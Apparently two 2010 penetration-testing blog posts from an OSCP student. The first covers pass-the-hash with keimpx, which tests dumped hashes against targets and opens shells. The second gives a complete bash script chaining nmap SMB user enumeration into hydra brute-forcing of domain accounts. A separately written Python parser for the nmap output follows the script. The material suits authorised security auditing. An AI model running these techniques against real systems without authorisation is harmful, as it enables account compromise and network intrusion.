Thursday, 25 November 2010

"Pass the hash, man!"

Whilst working my way through Offensive Security's excellent OSCP course, I found myself accumulating a fair amount of dumped hashes from some of the servers in the lab network. Most of the hashes were easy work for ophcrack, thanks to them being stored in LanMan format. However, most of the admin-level passwords were over 14 characters, so were stored in the much more secure NT hash form.

There was no way of getting hold of a rainbow table that covers passwords of this length, and all the dictionaries I had failed miserably.

Time to try another way....

First off, Metasploit provides a pass-the-hash method by way of the psexec module. This works well, but unfortunately only allows a single hash to be input.

Then I found Keimpx available here.

This tool proved to be a godsend. Simply paste all your hashes in the default pwdump-friendly format, plus any username/password combinations (format is username<single_space>password) into a txt file and enter the following command:
./keimpx -c hashes.txt -l targets.txt -v 2

This tool will then try all the passwords and un-cracked hashes against the targets and provide a simple output explaining which passwords worked on which machines. Fantastic!
Even better, it goes on to ask you which of the cracked machines you would like keimpx to open up a shell on!
So..... I urge you all to give it a try. The example pages on the link give you all the info you will need.

Sunday, 26 September 2010

Fast password auditing with nmap and hydra

I have been spending a lot of time with some of the nmap scripts recently, particularly the smb-brute and enum-users scripts. These work fine but I wanted to be able to have my own custom password list which I could fine-tune according to the target company, and also to the UK (i.e. to include football teams, companyname123, etc).

The smb-enum-users script is the best way I've found to pull usernames from a domain controller, so this is a good place to start. However, the output requires a bit of cleaning before I can use it for piping into hydra. Yes, smb-brute will do most of this, but I wanted to have a bit more control on things.

After a few hours spent learning the grep, cut and sed commands, I finally managed to produce a fairly clean user list, without all the computer accounts and other characters that I didn't require. This is then piped into hydra with the correct parameters to produce a nice output of cracked accounts. A few lines later and it becomes a simple yet effective program with which to quickly audit domain accounts.

I am new to shell scripting, so I'm betting this could be done in a much better way. Anyway, let me know if you find it as useful as I do.

#!/bin/bash
echo "*******************************************************"
echo "*                                                     *"
echo "*  Welcome to the Domain Account Bruteforce Tool.     *"
echo "*             By Sean gambles 21st Sep 2010           *"
echo "*******************************************************"
echo "This tool makes use of the nmap smb-enum-users script,"
echo "by basically exporting the results, in a cleaned up form"
echo "into hydra for bruteforcing."
echo "Currently, only working with server 2000, 2003 family."
echo "This is due to server 2008 not allowing unauthenticated"
echo "account enumeration."
echo "*** Please observe account lockout thresholds before"
echo "submitting your password file into this tool, as there"
echo "is no protection against lockouts taking place. ***"
read -p "Please enter the target server IP :" target
echo "Please enter the path to your password file"
read -p "E.g /root/passwords.txt :" passfile
echo "Enumerating users, please wait...."
# Keep the "Users" line of the script output, take the comma-separated list
# after the second colon, put one name per line, strip leading spaces and
# drop computer accounts (names ending in $).
nmap -p139,445 -n "$target" --script=smb-enum-users | grep Users | cut -d":" -f3 | tr "," "\n" | tr -d "^ " | grep -v '\$' >/tmp/users.txt
echo "The following accounts have been found:"
cat /tmp/users.txt
read -p "Press enter to start cracking the accounts."
echo "Trying passwords against all the user accounts, please wait...."
# One task at a time (-t1), also try an empty password (-e n), use the domain (-m D).
hydra "$target" smbnt -s445 -L /tmp/users.txt -P "$passfile" -t1 -e n -m D >/tmp/results.txt
rm /tmp/users.txt
echo "*********************************************************"
echo "Domain accounts found :"
grep login /tmp/results.txt | cut -d" " -f6-11
rm /tmp/results.txt
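The cleanup step above (grep, cut, tr, grep -v) is the part of the audit most likely to go wrong, so here is the same step written out as a small parser. This is an added example, not the post's own code: the nmap line it parses is a constructed sample in the shape the script's cut/tr chain expects (a line containing "Users:" followed by a comma-separated list, assumed here to be in DOMAIN\name form), and real nmap output may differ. Unlike tr -d " ", it keeps spaces inside a name, and it separates the computer accounts instead of silently dropping them.

```python
"""Clean an nmap smb-enum-users 'Users:' line into a plain account list."""
import re

# Constructed sample in the shape the post's pipeline greps for; NOT real nmap output.
SAMPLE_NMAP_OUTPUT = """\
Host script results:
| smb-enum-users: Users: EXAMPLE\\Administrator, EXAMPLE\\Guest, EXAMPLE\\jsmith, EXAMPLE\\WS01$, EXAMPLE\\DC01$, EXAMPLE\\svc backup
|_  (trailing line with no account list)
"""

# Case-sensitive so the lower-case "smb-enum-users:" prefix is not matched.
USERS_RE = re.compile(r"Users:\s*(.*)$")


def extract_accounts(nmap_output, strip_domain=True):
    """Return (users, computers) parsed from the 'Users:' line(s).

    Computer accounts are recognised by the trailing '$' that the script's
    grep -v '\\$' drops; here they are returned separately so the auditor
    can see what was excluded. The DOMAIN\\name form is an assumption.
    """
    users, computers = [], []
    for line in nmap_output.splitlines():
        match = USERS_RE.search(line)
        if not match:
            continue
        for raw in match.group(1).split(","):
            name = raw.strip()          # outer whitespace only; inner spaces kept
            if not name:
                continue
            if strip_domain and "\\" in name:
                name = name.split("\\", 1)[1]
            (computers if name.endswith("$") else users).append(name)
    return users, computers


if __name__ == "__main__":
    found_users, found_computers = extract_accounts(SAMPLE_NMAP_OUTPUT)
    print("users:", found_users)          # one name per line would feed hydra -L
    print("computer accounts skipped:", found_computers)
```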